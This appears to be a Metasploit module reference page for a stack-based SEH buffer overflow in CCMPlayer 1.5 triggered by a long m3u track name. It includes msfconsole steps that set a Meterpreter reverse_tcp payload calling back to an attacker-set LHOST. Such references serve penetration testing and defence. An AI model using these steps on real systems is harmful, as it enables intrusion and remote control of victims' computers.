CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow
This module exploits a stack-based buffer overflow in CCMPlayer 1.5. When an m3u playlist with a long track name is opened, an SEH exception record can be overwritten with parts of the controllable buffer. SEH execution is triggered after an invalid read of an injectable address, allowing arbitrary code execution. This module works on multiple Windows platforms, including Windows XP SP3, Windows Vista, and Windows 7.
Exploit Rank
- Good
Exploit Authors
- Rh0
Exploit Targets
- 0 - CCMPlayer 1.5 (default)
Similar Exploit Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Exploit Usage Information
$ msfconsole
msf > use exploit/windows/fileformat/ccmplayer_m3u_bof
msf exploit(ccmplayer_m3u_bof) > show payloads
msf exploit(ccmplayer_m3u_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ccmplayer_m3u_bof) > set LHOST [MY IP ADDRESS]
msf exploit(ccmplayer_m3u_bof) > exploit
Exploit Module Options
| Option | Description |
| --- | --- |
| FILENAME | The file name. (default: msf.m3u) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
